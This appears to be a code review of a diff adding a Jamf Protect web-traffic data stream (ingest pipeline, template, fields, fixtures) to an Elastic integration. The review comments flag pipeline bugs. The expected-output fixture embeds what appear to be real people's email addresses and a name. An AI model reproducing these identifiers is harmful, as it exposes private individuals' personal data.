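Review bot: These fixture lines embed what appear to be real personal identifiers — the mailboxes `matthew.ward@jamf.com` and `hjilling@icloud.com` and routable client addresses such as `107.10.9.64`, `24.209.152.211`, `64.20.34.139` and `2620:149:a41:880::2:7` — in a file that is published with the package. Fixtures in this repository conventionally use RFC 5737 documentation ranges (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`), RFC 3849 `2001:db8::/32` for IPv6 and `example.com` mailboxes; substituting them here, and regenerating the `-expected.json`, removes the personal data without changing what the pipeline test exercises.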
@@ -0,0 +1,337 @@ +{ + "expected": [ + { + "dns": { + "answers": { + "ttl": 101, + "type": "HTTPS" + }, + "question": { + "name": "s.youtube.com", + "registered_domain": "youtube", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:26:04.273Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "dns": { + "answers": { + "ttl": 144, + "type": "HTTPS" + }, + "question": { + "name": "edge.microsoft.com", + "registered_domain": "microsoft", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:29:12.031Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "c0dd2643-ae93-43a9-bc71-6d93555c1f54" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + } + }, + { + "dns": { + "answers": { + "ttl": 0, + "type": "HTTPS" + }, + "question": { + "name": "presence.services.sfb.trafficmanager.net", + "registered_domain": "trafficmanager", + "top_level_domain": "net" + }, + "response_code": "NOERROR" + }, + "ecs": { + 
"version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-01-25T02:20:05.709Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 36, + "type": "AAAA" + }, + "question": { + "name": "p25-content.icloud.com", + "registered_domain": "icloud", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-01-25T02:30:47.470Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 10, + "type": "A" + }, + "question": { + "name": "crowdexpert.org", + "registered_domain": "crowdexpert", + "top_level_domain": "org" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "failure" + ], + "provider": "Jamf Protect", + "reason": "DIRTY", + "start": 
"2024-01-24T20:18:55.235Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 0, + "type": "HTTPS" + }, + "question": { + "name": "sli.bidagy.com", + "registered_domain": "bidagy", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "failure" + ], + "provider": "Jamf Protect", + "reason": "DIRTY", + "start": "2024-01-12T03:51:47.216Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "cd531c8a-26ed-419a-8fd4-f67702f40ad5", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..030c4a24f77 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs 
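Review bot: This expected output pins `event.outcome` as an array (`["success"]`, `["failure"]`) and `host.os.type` as an array, whereas ECS defines both as single keywords; the traffic pipeline in this commit builds `event.outcome` with two `append` processors, and a `set` with the same conditions gives the scalar form. It also shows the two `DIRTY` inputs with `threat.types: ["malware"]` coming out with `event.category` of only `host` and `network`, consistent with the pipeline condition `ctx.jamf_protect?.traffic?.event?.threat?.types == 'malware'` comparing a list against a string; `ctx.jamf_protect?.traffic?.event?.threat?.types != null && ctx.jamf_protect.traffic.event.threat.types.contains('malware')` would match. This file would need regenerating after either fix.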
@@ -0,0 +1,38 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} +- preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} +- preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{#if content_type }} +content_type: {{ content_type }} +{{/if}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..14aac2e7595 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml 
@@ -0,0 +1,280 @@ +--- +description: Pipeline for parsing Jamf Protect Web Protection traffic logs +processors: + - set: + field: ecs.version + value: '8.11.0' + - json: + field: message + target_field: jamf_protect.traffic + if: ctx.message != null + - rename: + field: json + target_field: jamf_protect.traffic + if: ctx.json != null + +########################## +## ECS Observer Mapping ## +########################## + - set: + field: observer.product + value: Jamf Protect + - set: + field: observer.vendor + value: Jamf + +####################### +## ECS Event Mapping ## +####################### + - set: + field: event.kind + value: event + - set: + field: event.provider + value: Jamf Protect + - rename: + field: jamf_protect.traffic.event.timestamp + target_field: event.start + if: ctx.jamf_protect?.traffic?.event?.timestamp != null + - append: + field: event.category + value: host + - append: + field: event.category + value: network + - append: + field: event.type + value: connection + - append: + field: event.category + value: malware + if: ctx.jamf_protect?.traffic?.event?.threat?.types == 'malware' + - set: + field: event.action + value: '{{jamf_protect.traffic.event.signatureId.name}}' + if: ctx.jamf_protect?.traffic?.event?.signatureId?.name != null + - set: + field: event.reason + value: '{{jamf_protect.traffic.event.threat.result}}' + if: ctx.jamf_protect?.traffic?.event?.threat?.result != null + - append: + field: event.outcome + value: failure + if: ctx.jamf_protect?.traffic?.event?.blocked == true + - append: + field: event.outcome + value: success + if: ctx.jamf_protect?.traffic?.event?.blocked == false + # ignore_missing: true + + +####################### +## ECS Rule Mapping ## +####################### + - set: + field: rule.name + value: '{{jamf_protect.traffic.event.signatureId.name}}' + if: ctx.jamf_protect?.traffic?.event?.signatureId?.name != null + # ignore_missing: true + - rename: + field: jamf_protect.traffic.event.signatureId.id.toString() 
+ target_field: rule.id + if: ctx.jamf_protect?.traffic?.event?.signatureId?.id != null + ignore_missing: true + + +####################### +## ECS Host Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.device.userDeviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.traffic.event.device.deviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.deviceName == null && ctx.jamf_protect?.traffic?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.traffic.event.device.deviceId + target_field: host.id + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.deviceId != null + # - rename: + # field: jamf_protect.traffic.event.host.ips + # target_field: host.ip + # ignore_missing: true + # if: ctx.jamf_protect?.traffic?.event?.host?.ips != null && ctx.jamf_protect?.traffic?.event?.host?.ips != "" + - rename: + field: jamf_protect.traffic.event.device.os + target_field: host.os.full + if: ctx.jamf_protect?.traffic?.event?.device?.os != null + ignore_missing: true + - append: + field: host.os.type + value: ios + if: ctx.jamf_protect?.traffic?.event?.device?.osType == "IOS" + - append: + field: host.os.type + value: macos + if: ctx.jamf_protect?.traffic?.event?.device?.osType == "MAC_OS" + +####################### +## ECS Interface Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.networkInterface + target_field: interface.name + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.networkInterface != null + + +######################## +## ECS User Mapping ## +######################## + + - rename: + field: jamf_protect.traffic.event.user.name + target_field: user.name + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.user?.name != null + - rename: + field: 
jamf_protect.traffic.event.user.email + target_field: user.email + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.user?.email != null + + +######################## +## ECS DNS Mapping ## +######################## + - rename: + field: jamf_protect.traffic.event.tld + target_field: dns.question.top_level_domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.tld != null + - rename: + field: jamf_protect.traffic.event.domain + target_field: dns.question.registered_domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.domain != null + - rename: + field: jamf_protect.traffic.event.hostName + target_field: dns.question.name + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.hostName != null + + + - rename: + field: jamf_protect.traffic.event.dns.responseStatus + target_field: dns.response_code + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.responseStatus != null + - rename: + field: jamf_protect.traffic.event.dns.recordType + target_field: dns.answers.type + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.recordType != null + - rename: + field: jamf_protect.traffic.event.dns.ttl + target_field: dns.answers.ttl + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.ttl != null + - set: + field: dns.resolved_ip + value: '{{jamf_protect.traffic.event.destination.ip}}' + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.ip != null + +######################## +## ECS GEO Mapping ## +######################## + - rename: + field: jamf_protect.traffic.event.location + target_field: host.geo.country_iso_code + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.location != null + + +####################### +## ECS Destination Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.destination.ip + target_field: destination.address + # ignore_missing: true + if: 
ctx.jamf_protect?.traffic?.event?.destination?.ip != null + - rename: + field: jamf_protect.traffic.event.destination.name + target_field: destination.domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.name != null + - rename: + field: jamf_protect.traffic.event.destination.port + target_field: destination.port + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.port != null + + +####################### +## ECS Source Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.source.ip + target_field: source.address + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.ip != null + - rename: + field: jamf_protect.traffic.event.source.port + target_field: source.port + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.source?.port != null + +# ######################## +# # ECS Organization Mapping ## +# ######################## + - rename: + field: jamf_protect.traffic.event.account.customerId + target_field: organization.id + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.account?.customerId != null + +############# +## Cleanup ## +############# + - remove: + field: + - jamf_protect.traffic + - jamf_protect + - message + ignore_missing: true + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - script: + description: Drops null/empty values recursively. 
+ lang: painless
+ source:
+ boolean dropEmptyFields(Object object) {
+ if (object == null || object == '') {
+ return true;
+ } else if (object instanceof Map) {
+ ((Map) object).values().removeIf(value -> dropEmptyFields(value));
+ return (((Map) object).size() == 0);
+ } else if (object instanceof List) {
+ ((List) object).removeIf(value -> dropEmptyFields(value));
+ return (((List) object).length == 0);
+ }
+ return false;
+ }
+ dropEmptyFields(ctx);
+
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
\ No newline at end of file
diff --git a/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml b/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml
new file mode 100644
index 00000000000..92879829be9
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: event.dataset
+ type: constant_keyword
+ description: Name of the dataset.
+ value: jamf_protect.web-traffic-events
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: jamf_protect
diff --git a/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml b/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml
new file mode 100644
index 00000000000..77b07531fbe
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml
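Review bot: The `rename` whose `field` is `jamf_protect.traffic.event.signatureId.id.toString()` never matches anything, because a processor `field` is a literal dotted path rather than a Painless expression, and the `ignore_missing: true` beside it hides the miss, so `rule.id` is silently never populated; a `convert` to `type: string` with `target_field: rule.id` does what was intended (rewrite below). Two guards are also wrong: the `deviceName` fallback for `host.hostname` runs only when `deviceName == null`, i.e. never, and should read `ctx.jamf_protect?.traffic?.event?.device?.deviceName != null && ctx.jamf_protect?.traffic?.event?.device?.userDeviceName == null`, while the `source.ip` rename is conditioned on `destination?.ip` instead of `ctx.jamf_protect?.traffic?.event?.source?.ip != null`. `event.outcome` is a single-valued ECS keyword, so the two `append` processors should be `set` with `field: event.outcome` and `value: failure` / `value: success` rather than producing the array the sample event in this commit shows. Separately, the cleanup `remove` drops `jamf_protect.traffic` unconditionally and the mappings above are all `rename`s, so the `preserve_duplicate_custom_fields` tag the agent template adds has no effect in this pipeline; either copy with `set`/`copy_from` and guard that `remove` on the tag, or drop the option from the manifest.
```yaml
# … unchanged: rule.name set …
  - convert:
      field: jamf_protect.traffic.event.signatureId.id
      target_field: rule.id
      type: string
      ignore_missing: true
# … unchanged: userDeviceName rename …
  - rename:
      field: jamf_protect.traffic.event.device.deviceName
      target_field: host.hostname
      ignore_missing: true
      if: ctx.jamf_protect?.traffic?.event?.device?.deviceName != null && ctx.jamf_protect?.traffic?.event?.device?.userDeviceName == null
# … unchanged: host/interface/user/dns/geo/destination mappings …
  - rename:
      field: jamf_protect.traffic.event.source.ip
      target_field: source.address
      if: ctx.jamf_protect?.traffic?.event?.source?.ip != null
# … unchanged: source.port, organization, cleanup, on_failure …
```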
@@ -0,0 +1,212 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: dns.answers.ttl +- external: ecs + name: dns.answers.type +- external: ecs + name: dns.question.name +- external: ecs + name: dns.question.registered_domain +- external: ecs + name: dns.question.top_level_domain +- external: ecs + name: dns.response_code +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + 
name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.domain +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.type +- external: ecs + name: interface.name +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: rule.id +- external: ecs + 
name: tags +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: host.geo.country_iso_code +- external: ecs + name: group.name +- name: organization.id + type: keyword diff --git a/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml b/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml new file mode 100644 index 00000000000..4d92f6aee1b --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml 
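Review bot: The field list repeats many entries — `ecs.version`, `error.message`, `event.action`, `event.category`, `event.created`, `event.id`, `event.ingested`, `event.kind`, `event.severity`, `event.start`, `file.hash.md5`/`sha1`/`sha256`, `file.name`, `file.path`, `related.hash`/`hosts`/`ip`/`user`, `tags`, `user.domain` and `user.name` each appear twice — which reads as a second data stream's list pasted after the first; reduce it to one entry per field. `organization.id` is itself an ECS field, so it can be `- external: ecs` / `  name: organization.id` like its neighbours instead of a local `type: keyword`. As far as the pipeline in this commit shows, none of the `file.*`, `process.*`, `destination.as.*`, `destination.geo.*` or `network.*` names are ever written, so presumably they were copied from another stream and the list can be pruned to what the pipeline actually sets.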
@@ -0,0 +1,66 @@
+title: Receives Web Traffic Events from Jamf Protect with Elastic Agent.
+type: logs
+streams:
+ - input: http_endpoint
+ template_path: http_endpoint.yml.hbs
+ title: Jamf Protect Web Traffic Events
+ description: Receives Web Traffic Events from Jamf Protect with Elastic Agent.
+ vars:
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The port number the listener binds to.
+ multi: false
+ required: true
+ show_user: true
+ default: 9553
+ - name: url
+ type: text
+ title: URL
+ description: This option specifies which URL path to accept requests on. Defaults to /.
+ multi: false
+ required: false
+ show_user: false
+ default: /
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - jamf_protect-web-traffic-events
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: true
+ title: Preserve duplicate custom fields
+ description: Preserve custom fields for all ECS mappings.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - name: content_type
+ type: text
+ title: Content types
+ multi: false
+ default:
+ - application/json;charset=UTF-8
+ required: true
+ show_user: true
+ description: By default the input expects the incoming POST to include a Content-Type of application/json to try to enforce the incoming data to be valid JSON. In certain scenarios when the source of the request is not able to do that, it can be overwritten with another value or set to null.
diff --git a/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json b/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json
new file mode 100644
index 00000000000..5842b8ec846
--- /dev/null
+++ b/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json
@@ -0,0 +1,61 @@
+{
+ "dns": {
+ "answers": {
+ "ttl": 101,
+ "type": "HTTPS"
+ },
+ "question": {
+ "name": "s.youtube.com",
+ "registered_domain": "youtube",
+ "top_level_domain": "com"
+ },
+ "response_code": "NOERROR"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "action": "DNS Lookup",
+ "category": [
+ "host",
+ "network"
+ ],
+ "kind": "event",
+ "module": "jamf_protect",
+ "outcome": [
+ "success"
+ ],
+ "provider": "Jamf Protect",
+ "reason": "CLEAN",
+ "start": "2024-02-02T06:26:04.273Z",
+ "type": [
+ "connection"
+ ]
+ },
+ "host": {
+ "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c",
+ "os": {
+ "type": [
+ "ios"
+ ]
+ }
+ },
+ "interface": {
+ "name": "WIFI"
+ },
+ "jamf_protect": {},
+ "observer": {
+ "product": "Jamf Protect",
+ "vendor": "Jamf"
+ },
+ "organization": {
+ "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1"
+ },
+ "rule": {
+ "name": "DNS Lookup"
+ },
+ "user": {
+ "email": "user@acme.com",
+ "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4"
+ }
+}
\ No newline at end of file
diff --git a/packages/jamf_protect/docs/README.md b/packages/jamf_protect/docs/README.md
new file mode 100644
index 00000000000..1978df629b7
--- /dev/null
+++ b/packages/jamf_protect/docs/README.md
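Review bot: `content_type` is declared `type: text` with `multi: false`, yet its `default:` is a one-item YAML list (`- application/json;charset=UTF-8`), so the value the agent template renders into the scalar `content_type:` key is not what the declaration promises; make it `default: application/json;charset=UTF-8`. The stream declares no `listen_address`, `ssl`, `secret_header` or `secret_value` even though the agent template in this commit references all four; if they are package-level vars a short note under `vars:` such as `# listen_address, ssl and secret_* are package-level vars` would make that explicit, otherwise they need to be added here so the HTTP listener can run over TLS with a shared-secret header instead of open plaintext on the default port 9553.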
@@ -0,0 +1,1141 @@ +# Jamf Protect + +The Jamf Protect integration collects and parses data received from [Jamf Protect](https://learn.jamf.com/bundle/jamf-protect-documentation/page/About_Jamf_Protect.html) using a HTTP endpoint. + +Use the Jamf Protect integration to collect logs from your machines. +Then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. + +## Data streams + +The Jamf Protect integration collects 4 types of events: alerts, telemetry, web threat events, and web traffic events. + +[**Alerts**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Alerts.html) help you keep a record of Alerts and Unified Logs happening on endpoints using Jamf Protect. + +[**Telemetry**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) help you keep a record of audit events happening on endpoints using Jamf Protect. + +[**Web threat events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of web threat events happening on endpoints using Jamf Protect. + +[**Web traffic events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of content filtering and network requests happening on endpoints using Jamf Protect. + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. 
+ +## Setup + +To use this integration, you will also need to: +- Enable the integration in Elastic +- Configure Jamf Protect (macOS Security) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Remote Alert Collection Endpoints + - Unified Logs Collection Endpoints + - Telemetry Collection Endpoints +- Configure Jamf Protect (Jamf Security Cloud) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Threat Event Stream + - Network Traffic Stream + + +### Enable the integration in Elastic + +For step-by-step instructions on how to set up an new integration in Elastic, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +When setting up the integration, you will choose to collect logs via HTTP Endpoint. + +### Configure Jamf Protect + +After validating settings, you can configure Jamf Protect to send events to Elastic. +For more information on configuring Jamf Protect, see +- [Creating an Action Configuration](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) +- [Configure Threat Event Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) +- [Configure Network Traffic Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) + +Then, depending on which events you want to send to Elastic, configure one or multiple HTTP endpoints: + +**Remote Alert Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Unified Logs Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. 
+ +**Telemetry Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Threats Event Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Network Traffic Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + + +**Copyright (c) 2024, Jamf Software, LLC. All rights reserved.** + +## Logs reference + +#### alerts + +This is the `Alerts` dataset. + +##### Example + +An example event for `alerts` looks as following: + +```json +{ + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "User Elevated Action", + "category": [ + "host", + "process" + ], + "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4", + "kind": "alert", + "module": "jamf_protect", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "Application used deprecated elevation API", + "severity": 0, + "start": "2023-11-01T12:20:38.851Z", + "type": [ + "start" + ] + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "192.168.11.226" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "message": "{\"caid\":\"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7\",\"certid\":\"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea\",\"input\":{\"host\":{\"os\":\"Version 